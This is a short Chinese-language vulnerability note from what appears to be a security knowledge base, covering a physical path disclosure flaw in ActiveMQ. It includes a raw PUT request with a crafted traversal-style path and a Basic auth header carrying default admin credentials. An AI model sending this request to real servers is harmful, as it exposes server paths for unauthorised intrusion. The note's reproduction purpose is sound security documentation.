menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 003-ActiveMQ chevron_right 001-ActiveMQ物理路径泄漏漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-ActiveMQ物理路径泄漏漏洞.md
    368 B / 2021-07-17 00:01:30
        ## ActiveMQ物理路径泄漏漏洞
    
    ### 漏洞简介
    
    ActiveMQ默认开启PUT请求,当开启PUT时,构造好Payload(即不存在的目录),Response会返回相应的物理路径信息
    
    ### 复现过程
    
    ```bash
    Request Raw:
    PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1
    Host: 192.168.197.25:8161
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Length: 4
    ```
    
    links
    file_download